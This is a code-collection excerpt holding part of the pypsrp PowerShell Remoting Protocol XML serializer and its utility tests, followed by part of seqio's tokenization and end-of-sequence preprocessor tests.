"BA": lambda m, d: to_string(base64.b64encode(d)),
"G": lambda m, d: str(d),
"URI": lambda m, d: self._serialize_string(d),
"Version": lambda m, d: str(d),
"XD": lambda m, d: self._serialize_string(d),
"SBK": lambda m, d: self._serialize_string(d),
"SS": lambda m, d: self._serialize_secure_string(d),
"Obj": self._serialize_obj,
"ObjDynamic": self._serialize_dynamic_obj,
"LST": self._serialize_lst,
"IE": self._serialize_ie,
"QUE": self._serialize_que,
"STK": self._serialize_stk,
"DCT": self._serialize_dct,
}[
metadata.tag
]
if value is None:
if metadata.optional:
return None
element = ET.Element("Nil")
else:
element_value = pack_function(metadata, value)
if isinstance(element_value, str):
element = ET.Element(metadata.tag)
element.text = element_value
else:
element = element_value
if metadata.name is not None:
element.attrib["N"] = metadata.name
if parent is not None:
parent.append(element)
return element
def deserialize(
self,
element: typing.Union[ET.Element, str],
metadata: typing.Optional[ObjectMeta] = None,
clear: bool = True,
) -> typing.Any:
if clear:
self._clear()
if isinstance(element, str):
element_string = element
try:
element = ET.fromstring(element)
except ET.ParseError as err:
log.warning("Failed to parse data '%s' as XML, return raw xml: %s" % (element_string, str(err)))
return element_string
else:
xml_string = ET.tostring(element, encoding="utf-8", method="xml")
element_string = to_string(xml_string)
metadata = metadata or ObjectMeta()
if metadata.tag == "*":
metadata.tag = element.tag
# get the object types so we store the TN Ref ids for later use
obj_types = self._get_types_from_obj(element)
# check if it is a primitive object
unpack_function: typing.Optional[typing.Callable[[ET.Element], typing.Any]] = {
# Primitive types
"S": lambda d: self._deserialize_string(d.text),
"ToString": lambda d: self._deserialize_string(d.text),
"C": lambda d: chr(int(d.text)),
"B": lambda d: d.text.lower() == "true",
"DT": lambda d: d.text,
"TS": lambda d: d.text,
"By": lambda d: int(d.text),
"SB": lambda d: int(d.text),
"U16": lambda d: int(d.text),
"I16": lambda d: int(d.text),
"U32": lambda d: int(d.text),
"I32": lambda d: int(d.text),
"U64": lambda d: int(d.text),
"I64": lambda d: int(d.text),
"Sg": lambda d: float(d.text),
"Db": lambda d: float(d.text),
"D": lambda d: d.text, # TODO: deserialize this
"BA": lambda d: base64.b64decode(d.text),
"G": lambda d: uuid.UUID(d.text),
"URI": lambda d: self._deserialize_string(d.text),
"Nil": lambda d: None,
"Version": lambda d: d.text,
"XD": lambda d: self._deserialize_string(d.text),
"SBK": lambda d: self._deserialize_string(d.text),
"SS": lambda d: self._deserialize_secure_string(d),
# references an object already deserialized
"Ref": lambda d: self.obj[d.attrib["RefId"]],
}.get(element.tag)
if unpack_function is not None:
return unpack_function(element)
# not a primitive object, so try and decode the complex object
if type(metadata) == ObjectMeta and metadata.object is None:
structures = {
"Selected.Microsoft.PowerShell.Commands.GenericMeasureInfo": ObjectMeta(
"Obj", object=CommandMetadataCount
),
"System.Array": ListMeta(),
"System.Collections.ArrayList": ListMeta(),
"System.Collections.Hashtable": DictionaryMeta(),
"System.Collections.Generic.List": ListMeta(),
"System.Collections.Queue": QueueMeta(),
"System.Collections.Stack": StackMeta(),
"System.ConsoleColor": ObjectMeta("Obj", object=Color),
"System.Management.Automation.CommandOrigin": ObjectMeta("Obj", object=CommandOrigin),
"System.Management.Automation.DebugRecord": ObjectMeta("Obj", object=DebugRecord),
"System.Management.Automation.ErrorRecord": ObjectMeta("Obj", object=ErrorRecordMessage),
"System.Management.Automation.Host.Coordinates": ObjectMeta("Obj", object=Coordinates),
"System.Management.Automation.Host.KeyInfo": ObjectMeta("Obj", object=KeyInfoDotNet),
"System.Management.Automation.Host.Size": ObjectMeta("Obj", object=Size),
"System.Management.Automation.InformationalRecord": ObjectMeta("Obj", object=InformationalRecord),
"System.Management.Automation.InformationRecord": ObjectMeta("Obj", object=InformationRecord),
"System.Management.Automation.ParameterMetadata": ObjectMeta("Obj", object=ParameterMetadata),
"System.Management.Automation.ProgressRecordType": ObjectMeta("Obj", object=ProgressRecordType),
"System.Management.Automation.PSBoundParametersDictionary": DictionaryMeta(),
"System.Management.Automation.PSCredential": ObjectMeta("Obj", object=PSCredential),
"System.Management.Automation.PSObject": ObjectMeta("ObjDynamic", object=GenericComplexObject),
"System.Management.Automation.PSPrimitiveDictionary": DictionaryMeta(),
"System.Management.Automation.PSTypeName": ObjectMeta("S"),
"System.Management.Automation.Remoting.RemoteHostMethodId": ObjectMeta(
"Obj", object=HostMethodIdentifier
),
"System.Management.Automation.Runspaces.ApartmentState": ObjectMeta("Obj", object=ApartmentState),
"System.Management.Automation.Runspaces.PipelineResultTypes": ObjectMeta(
"Obj", object=PipelineResultTypes
),
"System.Management.Automation.Runspaces.PSThreadOptions": ObjectMeta("Obj", object=PSThreadOptions),
"System.Management.Automation.Runspaces.RemoteStreamOptions": ObjectMeta(
"Obj", object=RemoteStreamOptions
),
"System.Management.Automation.SessionStateEntryVisibility": ObjectMeta(
"Obj", object=SessionStateEntryVisibility
),
"System.Management.Automation.VerboseRecord": ObjectMeta("Obj", object=VerboseRecord),
"System.Management.Automation.WarningRecord": ObjectMeta("Obj", object=WarningRecord),
"System.Globalization.CultureInfo": ObjectMeta("Obj", object=CultureInfo),
# Fallback to the GenericComplexObject
"System.Object": ObjectMeta("ObjDynamic", object=GenericComplexObject),
# Primitive types
"System.String": ObjectMeta("S"),
"System.Char": ObjectMeta("C"),
"System.Boolean": ObjectMeta("B"),
"System.DateTime": ObjectMeta("DT"),
# None: ObjectMeta("TS"), # duration timespan
"System.Byte": ObjectMeta("By"),
"System.SByte": ObjectMeta("SB"),
"System.UInt16": ObjectMeta("U16"),
"System.Int16": ObjectMeta("I16"),
"System.UInt32": ObjectMeta("U32"),
"System.Int32": ObjectMeta("I32"),
"System.UInt64": ObjectMeta("U64"),
"System.Int64": ObjectMeta("I64"),
"System.Single": ObjectMeta("Sg"),
"System.Double": ObjectMeta("Db"),
"System.Decimal": ObjectMeta("D"),
# None: ObjectMeta("BA"), # Byte array base64 encoded
"System.Guid": ObjectMeta("G"),
"System.Uri": ObjectMeta("URI"),
"System.Version": ObjectMeta("Version"),
"System.Xml.XmlDocument": ObjectMeta("XD"),
"System.Management.Automation.ScriptBlock": ObjectMeta("SBK"),
"System.Security.SecureString": ObjectMeta("SS"),
}
# fallback to GenericComplexObject if no types were defined
if metadata.tag == "Obj" and len(obj_types) == 0:
obj_types = ["System.Object"]
metadata = None
for obj_type in obj_types:
if obj_type.startswith("Deserialized.System."):
obj_type = obj_type[13:]
is_list = False
if obj_type.endswith("[]"):
obj_type = obj_type[0:-2]
is_list = True
elif obj_type.startswith("System.Collections.Generic.List`1[["):
list_info = obj_type[35:-1]
obj_type = list_info.split(",")[0]
is_list = True
elif obj_type.startswith("System.Collections.ObjectModel.Collection`1[["):
list_info = obj_type[45:-1]
obj_type = list_info.split(",")[0]
is_list = True
elif obj_type.startswith("System.Collections.ObjectModel.ReadOnlyCollection`1[["):
list_info = obj_type[53:-1]
obj_type = list_info.split(",")[0]
is_list = True
elif obj_type.startswith("System.Collections.Generic.Dictionary`2[["):
dict_meta = obj_type[41:-2].split("],[")
key_type = structures.get(dict_meta[0].split(",")[0], ObjectMeta())
value_type = structures.get(dict_meta[1].split(",")[0], ObjectMeta())
metadata = DictionaryMeta(dict_key_meta=key_type, dict_value_meta=value_type)
break
obj_meta = structures.get(obj_type)
if obj_meta is not None:
metadata = obj_meta
if is_list:
metadata = ListMeta(list_value_meta=metadata)
break
# we were unable to find the complex object type so just return the
# element
obj: typing.Any
if metadata is None:
obj = element_string
elif metadata.tag == "Obj":
obj = self._deserialize_obj(element, metadata)
elif metadata.tag == "ObjDynamic":
obj = self._deserialize_dynamic_obj(element, metadata)
elif metadata.tag == "LST":
obj = self._deserialize_lst(element, metadata)
elif metadata.tag == "QUE":
obj = self._deserialize_que(element)
elif metadata.tag == "STK":
obj = self._deserialize_stk(element)
elif metadata.tag == "DCT":
obj = self._deserialize_dct(element)
else:
log.warning("Unknown metadata tag type '%s', failed to deserialize object" % metadata.tag)
obj = element_string
if element.tag == "Obj":
self.obj[element.attrib["RefId"]] = obj
if isinstance(obj, ComplexObject):
obj._xml = element_string
return obj
def _get_tag_from_value(
self,
value: typing.Any,
) -> str:
# Get's the XML tag based on the value type, this is a simple list
# and explicit tagging is recommended.
value_type = type(value)
if value_type == int:
return "I32"
elif value_type == bool:
return "B"
elif value_type == float:
return "Sg"
elif value_type == str:
return "S"
elif value_type == bytes:
# This will only occur in Python 3 as a byte string in Python 2 is
# a str. If users on that platform want a BA then they need to
# explicitly set the metadata themselves
return "BA"
elif value_type == uuid.UUID:
return "G"
elif value_type == list:
return "LST"
elif value_type == dict:
return "DCT"
elif isinstance(value, Queue):
return "QUE"
elif isinstance(value, GenericComplexObject):
return "ObjDynamic"
elif isinstance(value, ComplexObject):
return "Obj"
else:
# catch all, this probably isn't right but will not throw an
# error
return "S"
def _serialize_obj(
self,
metadata: ObjectMeta,
value: typing.Any,
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
if len(value._types) > 0:
self._create_tn(obj, value._types)
to_string_value = value._to_string
if to_string_value is not None:
ET.SubElement(obj, "ToString").text = self._serialize_string(to_string_value)
for attr, property_meta in value._property_sets:
attr_value = getattr(value, attr)
self._create_obj(obj, attr_value, meta=property_meta)
def serialize_prop(parent: str, properties: typing.Tuple[typing.Tuple[str, ObjectMeta], ...]) -> None:
if len(properties) == 0:
return
parent_et = ET.SubElement(obj, parent)
for attr, property_meta in properties:
attr_value = getattr(value, attr)
self._create_obj(parent_et, attr_value, meta=property_meta)
serialize_prop("MS", value._extended_properties)
serialize_prop("Props", value._adapted_properties)
return obj
def _serialize_dynamic_obj(
self,
metadata: ObjectMeta,
value: typing.Any,
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
self.obj[obj.attrib["RefId"]] = value
if len(value.types) > 0:
self._create_tn(obj, value.types)
if value.to_string is not None:
ET.SubElement(obj, "ToString").text = self._serialize_string(value.to_string)
for prop in value.property_sets:
self._create_obj(obj, prop)
def set_properties(element: str, prop_name: str) -> None:
prop_keys = list(getattr(value, prop_name).keys())
if len(prop_keys) == 0:
return
parent = ET.SubElement(obj, element)
prop_keys.sort()
for key in prop_keys:
prop = getattr(value, prop_name)[key]
self._create_obj(parent, prop, key=key)
set_properties("MS", "extended_properties")
set_properties("Props", "adapted_properties")
return obj
def _serialize_que(
self,
metadata: QueueMeta,
values: Queue,
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
if not isinstance(metadata, QueueMeta):
metadata = QueueMeta(name=metadata.name, optional=metadata.optional)
self._create_tn(obj, metadata.list_types)
que = ET.SubElement(obj, "QUE")
while True:
try:
value = values.get(block=False)
self.serialize(value, metadata.list_value_meta, parent=que, clear=False)
except Empty:
break
return obj
def _serialize_stk(
self,
metadata: StackMeta,
values: typing.List,
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
self._create_tn(obj, metadata.list_types)
stk = ET.SubElement(obj, "STK")
while True:
try:
value = values.pop()
self.serialize(value, metadata.list_value_meta, parent=stk, clear=False)
except IndexError:
break
return obj
def _serialize_ie(
self,
metadata: ListMeta,
values: typing.List,
) -> ET.Element:
return self._serialize_lst(metadata, values, tag="IE")
def _serialize_lst(
self,
metadata: ListMeta,
values: typing.List,
tag: str = "LST",
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
if not isinstance(metadata, ListMeta):
metadata = ListMeta(name=metadata.name, optional=metadata.optional)
self._create_tn(obj, metadata.list_types)
lst = ET.SubElement(obj, tag)
for value in iter(values):
entry_meta = copy(metadata.list_value_meta)
self.serialize(value, entry_meta, parent=lst, clear=False)
return obj
def _serialize_dct(
self,
metadata: DictionaryMeta,
values: typing.Dict,
) -> ET.Element:
obj = ET.Element("Obj", RefId=self._get_obj_id())
if not isinstance(metadata, DictionaryMeta):
metadata = DictionaryMeta(name=metadata.name, optional=metadata.optional)
self._create_tn(obj, metadata.dict_types)
dct = ET.SubElement(obj, "DCT")
# allow dicts to be defined as a tuple so that the order is kept
iterator: typing.Iterable[typing.Tuple[typing.Any, typing.Any]]
if isinstance(values, tuple):
iterator = values
else:
iterator = values.items()
for key, value in iterator:
en = ET.SubElement(dct, "En")
key_meta = copy(metadata.dict_key_meta)
value_meta = copy(metadata.dict_value_meta)
self.serialize(key, key_meta, parent=en, clear=False)
self.serialize(value, value_meta, parent=en, clear=False)
return obj
def _serialize_string(
self,
value: typing.Optional[str],
) -> typing.Optional[str]:
if value is None:
return None
def rplcr(matchobj):
surrogate_char = matchobj.group(0)
byte_char = to_bytes(surrogate_char, encoding="utf-16-be")
hex_char = to_unicode(binascii.hexlify(byte_char)).upper()
hex_split = [hex_char[i : i + 4] for i in range(0, len(hex_char), 4)]
return "".join(["_x%s_" % i for i in hex_split])
# before running the translation we need to make sure _ before x is
# encoded, normally _ isn't encoded except when preceding x
string_value = to_unicode(value)
# The MS-PSRP docs don't state this but the _x0000_ matcher is case insensitive so we need to make sure we
# escape _X as well as _x.
string_value = re.sub("(?i)_(x)", "_x005F_\\1", string_value)
string_value = re.sub(self._serial_str, rplcr, string_value)
return string_value
def _serialize_secure_string(
self,
value: str,
) -> str:
if self.cipher is None:
raise SerializationError("Cannot generate secure string as cipher is not initialised")
# convert the string to a UTF-16 byte string as that is what is
# expected in Windows. If a byte string (native string in Python 2) was
# passed in, the sender must make sure it is a valid UTF-16
# representation and not UTF-8 or else the server will fail to decrypt
# the secure string in most cases
string_bytes = to_bytes(value, encoding="utf-16-le")
padder = PKCS7(self.cipher.algorithm.block_size).padder()
padded_data = padder.update(string_bytes) + padder.finalize()
encryptor = self.cipher.encryptor()
ss_value = encryptor.update(padded_data) + encryptor.finalize()
ss_string = to_string(base64.b64encode(ss_value))
return ss_string
def _deserialize_obj(
self,
element: ET.Element,
metadata: ObjectMeta,
) -> typing.Any:
obj = metadata.object() # type: ignore[misc] # Caller always sets object
self.obj[element.attrib["RefId"]] = obj
to_string_value = element.find("ToString")
if to_string_value is not None:
obj._to_string = self._deserialize_string(to_string_value.text)
def deserialize_property(prop_tag: str, properties: typing.Tuple[typing.Tuple[str, ObjectMeta], ...]) -> None:
for attr, property_meta in properties:
if attr == "invocation_info":
a = ""
property_name = "Unknown"
property_filter = ""
if property_meta.name is not None:
property_name = property_meta.name
property_filter = "[@N='%s']" % property_meta.name
tags = [property_meta.tag]
# The below tags are actually seen as Obj in the parent element
if property_meta.tag in ["DCT", "LST", "IE", "QUE", "STK", "ObjDynamic"]:
tags = ["Obj", "Ref"]
val = None
for tag in tags:
val = element.find("%s%s%s" % (prop_tag, tag, property_filter))
if val is not None:
break
if val is None and not property_meta.optional:
val = element.find("%sNil%s" % (prop_tag, property_filter))
if val is None:
obj_name = str(obj) if obj._to_string is not None else "Unknown"
err_msg = "Mandatory return value for '%s' was not found on object %s" % (
property_name,
obj_name,
)
raise SerializationError(err_msg)
val = None
elif val is not None:
val = self.deserialize(val, property_meta, clear=False)
setattr(obj, attr, val)
deserialize_property("", obj._property_sets)
deserialize_property("Props/", obj._adapted_properties)
deserialize_property("MS/", obj._extended_properties)
return obj
def _deserialize_dynamic_obj(
self,
element: ET.Element,
metadata: ObjectMeta,
) -> typing.Any:
obj = metadata.object() # type: ignore[misc] # Caller always sets object
self.obj[element.attrib["RefId"]] = obj
for obj_property in element:
if obj_property.tag == "TN":
for obj_type in obj_property:
obj.types.append(obj_type.text)
self.tn[obj_property.attrib["RefId"]] = obj.types
elif obj_property.tag == "TNRef":
obj.types = self.tn[obj_property.attrib["RefId"]]
elif obj_property.tag == "Props":
for adapted_property in obj_property:
key = adapted_property.attrib["N"]
value = self.deserialize(adapted_property, clear=False)
obj.adapted_properties[key] = value
elif obj_property.tag == "MS":
for extended_property in obj_property:
key = extended_property.attrib["N"]
value = self.deserialize(extended_property, clear=False)
obj.extended_properties[key] = value
elif obj_property.tag == "ToString":
value = self.deserialize(obj_property, clear=False)
obj.to_string = value
else:
value = self.deserialize(obj_property, clear=False)
obj.property_sets.append(value)
return obj
def _deserialize_lst(
self,
element: ET.Element,
metadata: typing.Optional[ObjectMeta] = None,
) -> typing.List:
list_value = []
value_meta = getattr(metadata, "list_value_meta", None)
entries = element.find("LST")
for entry in entries or []:
entry_value = self.deserialize(entry, value_meta, clear=False)
list_value.append(entry_value)
return list_value
def _deserialize_que(
self,
element: ET.Element,
) -> Queue:
queue: Queue = Queue()
entries = element.find("QUE")
for entry in entries or []:
entry_value = self.deserialize(entry, clear=False)
queue.put(entry_value)
return queue
def _deserialize_stk(
self,
element: ET.Element,
) -> typing.List:
# no native Stack object in Python so just use a list
stack = []
entries = element.find("STK")
for entry in entries or []:
entry_value = self.deserialize(entry, clear=False)
stack.append(entry_value)
return stack
def _deserialize_dct(
self,
element: ET.Element,
) -> typing.Dict:
dictionary = {}
entries = element.findall("DCT/En")
for entry in entries:
key = entry.find("*[@N='Key']")
value = entry.find("*[@N='Value']")
key = self.deserialize(key if key is not None else "", clear=False)
value = self.deserialize(value if value is not None else "", clear=False)
dictionary[key] = value
return dictionary
def _deserialize_string(
self,
value: typing.Optional[str],
) -> str:
if value is None:
return ""
def rplcr(matchobj):
# The matched object is the UTF-16 byte representation of the UTF-8
# hex string value. We need to decode the byte str to unicode and
# then unhexlify that hex string to get the actual bytes of the
# _x****_ value, e.g.
# group(0) == b"\x00_\x00x\x000\x000\x000\x00A\x00_"
# group(1) == b"\x000\x000\x000\x00A"
# unicode (from utf-16-be) == u"000A"
# returns b"\x00\x0A"
match_hex = matchobj.group(1)
hex_string = to_unicode(match_hex, encoding="utf-16-be")
return binascii.unhexlify(hex_string)
# need to ensure we start with a unicode representation of the string
# so that we can get the actual UTF-16 bytes value from that string
unicode_value = to_unicode(value)
unicode_bytes = to_bytes(unicode_value, encoding="utf-16-be")
bytes_value = re.sub(self._deserial_str, rplcr, unicode_bytes)
return to_unicode(bytes_value, encoding="utf-16-be")
def _deserialize_secure_string(self, value: ET.Element) -> typing.Union[ET.Element, str]:
if self.cipher is None:
# cipher is not set up so we can't decrypt the string, just return
# the raw element
return value
ss_string = base64.b64decode(value.text or "")
decryptor = self.cipher.decryptor()
decrypted_bytes = decryptor.update(ss_string) + decryptor.finalize()
unpadder = PKCS7(self.cipher.algorithm.block_size).unpadder()
unpadded_bytes = unpadder.update(decrypted_bytes) + unpadder.finalize()
decrypted_string = to_unicode(unpadded_bytes, "utf-16-le")
return decrypted_string
def _clear(self) -> None:
self.obj_id = 0
self.obj = {}
self.tn = {}
self.tn_id = 0
def _get_obj_id(self) -> str:
ref_id = str(self.obj_id)
self.obj_id += 1
return ref_id
def _get_types_from_obj(
self,
element: ET.Element,
) -> typing.List[str]:
obj_types = [e.text or "" for e in element.findall("TN/T")]
if len(obj_types) > 0:
ref_id = element.find("TN").attrib["RefId"] # type: ignore[union-attr] # Mandated by the spec
self.tn[ref_id] = obj_types
tn_ref = element.find("TNRef")
if tn_ref is not None:
ref_id = tn_ref.attrib["RefId"]
obj_types = self.tn[ref_id]
return obj_types
def _create_tn(
self,
parent: ET.Element,
types: typing.List[str],
) -> None:
main_type = types[0]
ref_id = self.tn.get(main_type, None)
if ref_id is None:
ref_id = self.tn_id
self.tn_id += 1
self.tn[main_type] = ref_id
tn = ET.SubElement(parent, "TN", RefId=str(ref_id))
for type_name in types:
ET.SubElement(tn, "T").text = type_name
else:
ET.SubElement(parent, "TNRef", RefId=str(ref_id))
def _create_obj(
self,
parent: ET.Element,
obj: typing.Any,
key: typing.Optional[str] = None,
meta: typing.Optional[ObjectMeta] = None,
) -> None:
if isinstance(obj, ComplexObject):
for ref, value in self.obj.items():
if value == obj:
sub_element = ET.SubElement(parent, "Ref", RefId=ref)
if key is not None:
sub_element.attrib["N"] = key
return
if meta is None:
meta = ObjectMeta(name=key)
self.serialize(obj, metadata=meta, parent=parent, clear=False)
class TaggedValue(object):
def __init__(
self,
tag: str,
value: typing.Any,
) -> None:
self.tag = tag
self.value = value
```
#### File: pypsrp/tests/test_utils.py
```python
import pytest
from pypsrp._utils import (
get_hostname,
to_bytes,
to_string,
to_unicode,
version_equal_or_newer,
)
def test_unicode_to_bytes_default():
expected = b"\x61\x62\x63"
actual = to_bytes("abc")
assert actual == expected
def test_unicode_to_bytes_diff_encoding():
expected = b"\x61\x00\x62\x00\x63\x00"
actual = to_bytes("abc", encoding="utf-16-le")
assert actual == expected
def test_bytes_to_bytes():
expected = b"\x01\x02\x03\x04"
actual = to_bytes(b"\x01\x02\x03\x04")
assert actual == expected
def test_str_to_bytes():
# Python 3 the default string type is unicode so the expected value will
# be "abc" in UTF-16 form while Python 2 "abc" is the bytes representation
# already
expected = b"\x61\x00\x62\x00\x63\x00"
actual = to_bytes("abc", encoding="utf-16-le")
assert actual == expected
def test_unicode_to_unicode():
expected = "abc"
actual = to_unicode("abc")
assert actual == expected
def test_byte_to_unicode():
expected = "abc"
actual = to_unicode(b"\x61\x62\x63")
assert actual == expected
def test_byte_to_unicode_diff_encoding():
expected = "abc"
actual = to_unicode(b"\x61\x00\x62\x00\x63\x00", encoding="utf-16-le")
assert actual == expected
def test_str_to_unicode():
expected = "a\x00b\x00c\x00"
actual = to_unicode("a\x00b\x00c\x00", encoding="utf-16-le")
assert actual == expected
def test_to_str():
assert str(to_string).startswith("<function to_unicode")
@pytest.mark.parametrize(
"version, reference_version, expected",
[
["2.2", "2.3", False],
["2.3", "2.3", True],
["2.4", "2.3", True],
["3", "2.3", True],
["3.0", "2.3", True],
["1", "2.3", False],
["1.0", "2.3", False],
["2.3.0", "2.3", True],
["2.3.1", "2.3", True],
["2.3", "2.3.0", True],
["2.3", "2.3.1", False],
],
)
def test_version_newer(version, reference_version, expected):
assert version_equal_or_newer(version, reference_version) == expected
@pytest.mark.parametrize(
"url, expected",
[
# hostname
["http://hostname", "hostname"],
["https://hostname", "hostname"],
["http://hostname:1234", "hostname"],
["https://hostname:1234", "hostname"],
["http://hostname/path", "hostname"],
["https://hostname/path", "hostname"],
["http://hostname:1234/path", "hostname"],
["https://hostname:1234/path", "hostname"],
# fqdn
["http://hostname.domain.com", "hostname.domain.com"],
["https://hostname.domain.com", "hostname.domain.com"],
["http://hostname.domain.com:1234", "hostname.domain.com"],
["https://hostname.domain.com:1234", "hostname.domain.com"],
["http://hostname.domain.com/path", "hostname.domain.com"],
["https://hostname.domain.com/path", "hostname.domain.com"],
["http://hostname.domain.com:1234/path", "hostname.domain.com"],
["https://hostname.domain.com:1234/path", "hostname.domain.com"],
# ip address
["http://1.2.3.4", "1.2.3.4"],
["https://1.2.3.4", "1.2.3.4"],
["http://1.2.3.4:1234", "1.2.3.4"],
["https://1.2.3.4:1234", "1.2.3.4"],
["http://1.2.3.4/path", "1.2.3.4"],
["https://1.2.3.4/path", "1.2.3.4"],
["http://1.2.3.4:1234/path", "1.2.3.4"],
["https://1.2.3.4:1234/path", "1.2.3.4"],
],
)
def test_get_hostname(url, expected):
assert expected == get_hostname(url)
``` |
{
"source": "00mjk/seqio",
"score": 2
} |
#### File: seqio/seqio/preprocessors_test.py
```python
from absl.testing import absltest
from seqio import dataset_providers
from seqio import preprocessors
from seqio import test_utils
import tensorflow.compat.v2 as tf
assert_dataset = test_utils.assert_dataset
Feature = dataset_providers.Feature
class PreprocessorsTest(tf.test.TestCase):
def test_tokenize(self):
og_dataset = tf.data.Dataset.from_tensors({
'prefix': 'This is',
'suffix': 'a test.'
})
output_features = {
'prefix': Feature(
test_utils.MockVocabulary({'This is': [0, 1]}), add_eos=True),
'suffix': Feature(
test_utils.MockVocabulary({'a test.': [2, 3]}), add_eos=False),
}
assert_dataset(
preprocessors.tokenize(og_dataset, output_features=output_features), {
'prefix': [0, 1],
'prefix_pretokenized': 'This is',
'suffix': [2, 3],
'suffix_pretokenized': 'a test.'
})
assert_dataset(
preprocessors.tokenize(
og_dataset, output_features=output_features,
copy_pretokenized=False),
{
'prefix': [0, 1],
'suffix': [2, 3]
})
assert_dataset(
preprocessors.tokenize_and_append_eos(
og_dataset, output_features=output_features,
copy_pretokenized=False),
{
'prefix': [0, 1, 1],
'suffix': [2, 3]
})
def test_tokenize_multiple_ranks(self):
vocab = test_utils.sentencepiece_vocab()
output_features = {
'prefix': Feature(vocab, add_eos=True),
'suffix': Feature(vocab, add_eos=False),
}
# Test for 1-rank features.
og_dataset_1d = tf.data.Dataset.from_tensors({
'prefix': ['This is', 'this is'],
'suffix': ['a test.', 'another']
})
assert_dataset(
preprocessors.tokenize(og_dataset_1d, output_features=output_features),
{
'prefix': [[3, 2, 20, 8, 6, 3, 8, 6], [11, 8, 6, 3, 8, 6]],
'prefix_pretokenized': ['This is', 'this is'],
'suffix': [[3, 5, 10, 2], [3, 5, 22, 7, 24, 20, 4, 23]],
'suffix_pretokenized': ['a test.', 'another']
})
assert_dataset(
preprocessors.tokenize(
og_dataset_1d, output_features=output_features, with_eos=True), {
'prefix': [[3, 2, 20, 8, 6, 3, 8, 6], [11, 8, 6, 3, 8, 6, 1]],
'prefix_pretokenized': ['This is', 'this is'],
'suffix': [[3, 5, 10, 2], [3, 5, 22, 7, 24, 20, 4, 23]],
'suffix_pretokenized': ['a test.', 'another']
})
# Test for 2-rank features.
og_dataset_2d = tf.data.Dataset.from_tensors({
'prefix': [['This is'], ['this is']],
'suffix': [['a test.'], ['another']]
})
assert_dataset(
preprocessors.tokenize(og_dataset_2d, output_features=output_features),
{
'prefix': [[[3, 2, 20, 8, 6, 3, 8, 6]], [[11, 8, 6, 3, 8, 6]]],
'prefix_pretokenized': [['This is'], ['this is']],
'suffix': [[[3, 5, 10, 2]], [[3, 5, 22, 7, 24, 20, 4, 23]]],
'suffix_pretokenized': [['a test.'], ['another']]
})
assert_dataset(
preprocessors.tokenize(
og_dataset_2d, output_features=output_features, with_eos=True), {
'prefix': [[[3, 2, 20, 8, 6, 3, 8, 6, 1]],
[[11, 8, 6, 3, 8, 6, 1]]],
'prefix_pretokenized': [['This is'], ['this is']],
'suffix': [[[3, 5, 10, 2]], [[3, 5, 22, 7, 24, 20, 4, 23]]],
'suffix_pretokenized': [['a test.'], ['another']]
})
# Test for 3-rank features.
og_dataset_3d = tf.data.Dataset.from_tensors({
'prefix':
tf.ragged.constant([[['a', 'b'], ['c']], [['d', 'e'], ['f']],
[['g', 'h'], ['i']]]),
'suffix':
tf.ragged.constant([[['j'], ['k', 'l', 'm']], [['n'], ['o', 'p']]]),
})
assert_dataset(
preprocessors.tokenize(og_dataset_3d, output_features=output_features),
{
'prefix': [[[[3, 5], [3, 2]], [[3, 13]]],
[[[3, 21], [3, 4]], [[3, 2]]],
[[[3, 2], [3, 20]], [[3, 8]]]],
'prefix_pretokenized': [[['a', 'b'], ['c']], [['d', 'e'], ['f']],
[['g', 'h'], ['i']]],
'suffix': [[[[3, 2]], [[3, 2], [3, 9], [3, 14]]],
[[[3, 22]], [[3, 7], [3, 15]]]],
'suffix_pretokenized': [[['j'], ['k', 'l', 'm']], [['n'],
['o', 'p']]],
})
assert_dataset(
preprocessors.tokenize(
og_dataset_3d, output_features=output_features, with_eos=True),
{
'prefix': [[[[3, 5], [3, 2, 1]], [[3, 13, 1]]],
[[[3, 21], [3, 4, 1]], [[3, 2, 1]]],
[[[3, 2], [3, 20, 1]], [[3, 8, 1]]]],
'prefix_pretokenized': [[['a', 'b'], ['c']], [['d', 'e'], ['f']],
[['g', 'h'], ['i']]],
'suffix': [[[[3, 2]], [[3, 2], [3, 9], [3, 14]]],
[[[3, 22]], [[3, 7], [3, 15]]]],
'suffix_pretokenized': [[['j'], ['k', 'l', 'm']], [['n'],
['o', 'p']]],
})
def test_append_eos(self):
# Features for this test:
# name | shape | add_eos | seq_length
# ---------+-----------+---------+-----------
# inputs | [3] | False | 4
# targets | [4] | True | 3
# arrows | [4] | True | 5
# strings | [3, 2] | True | 3
# feathers | [3, None] | True | 4
# bows | [2] | n/a | 1
og_dataset = tf.data.Dataset.from_tensors({
'inputs': [1, 2, 3],
'targets': [4, 5, 6, 7],
'arrows': [8, 9, 10, 11],
'strings': [[14, 15], [16, 17], [18, 19]],
'feathers': tf.ragged.constant([[20, 21], [], [22, 23, 24, 25, 26]]),
'bows': [12, 13],
})
vocab = test_utils.sentencepiece_vocab()
output_features = {
'inputs': Feature(vocab, add_eos=False),
'targets': Feature(vocab, add_eos=True),
'arrows': Feature(vocab, add_eos=True),
'strings': Feature(vocab, add_eos=True),
'feathers': Feature(vocab, add_eos=True),
}
sequence_length = {
'inputs': 4,
'targets': 3,
'arrows': 5,
'strings': 3,
'feathers': 4,
'bows': 1 # note: ignored, since bows is not in output_features.
}
# Add eos only.
assert_dataset(
preprocessors.append_eos(og_dataset, output_features), {
'inputs': [1, 2, 3],
'targets': [4, 5, 6, 7, 1],
'arrows': [8, 9, 10, 11, 1],
'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]],
'feathers': [[20, 21, 1], [1], [22, 23, 24, 25, 26, 1]],
'bows': [12, 13],
})
# Trim to sequence lengths.
assert_dataset(
preprocessors.append_eos_after_trim(
og_dataset,
output_features=output_features,
sequence_length=sequence_length), {
'inputs': [1, 2, 3],
'targets': [4, 5, 1],
'arrows': [8, 9, 10, 11, 1],
'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]],
'feathers': [[20, 21, 1], [1], [22, 23, 24, 1]],
'bows': [12, 13],
})
# Trim to sequence lengths (but with targets=None).
sequence_length['targets'] = None
assert_dataset(
preprocessors.append_eos_after_trim(
og_dataset,
output_features=output_features,
sequence_length=sequence_length), {
'inputs': [1, 2, 3],
'targets': [4, 5, 6, 7, 1],
'arrows': [8, 9, 10, 11, 1],
'strings': [[14, 15, 1], [16, 17, 1], [18, 19, 1]],
'feathers': [[20, 21, 1], [1], [22, 23, 24, 1]],
